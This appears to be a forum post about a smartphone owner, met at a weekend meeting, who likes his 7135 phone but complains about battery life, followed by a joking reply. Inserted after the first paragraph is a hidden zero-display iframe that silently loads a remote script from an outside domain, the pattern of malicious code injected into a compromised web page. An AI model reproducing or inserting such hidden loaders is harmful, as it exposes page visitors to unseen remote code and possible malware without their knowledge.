I've been attending a meeting this weekend where one of the other attendees has a 7135. I talked with him at lunch today. This is a guy who has never heard of smartphonesource and knew nothing about the delay of Verizon releasing the phone. He lives in West Virginia and is an Alltel subscriber. He got the phone about 2 weeks ago and he really likes it. Unfortunately he wouldn't give it to me permanently, but I got to play with it for a while.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

He is not what you would consider a power user and hasn't really scratched the surface of the phone's capabilities. For example, he has never tried any video, although he proudly showed me still photos of his two horses.

His only criticism of the phone was related to battery life. I told him to try setting the brightness dimmer and see if that would lengthen his battery life.

Indeed.... he is not worthy. I am disappointed that Dave did not adhere to the unspoken SPS "code" and call for lightning to strike the man down where he stood
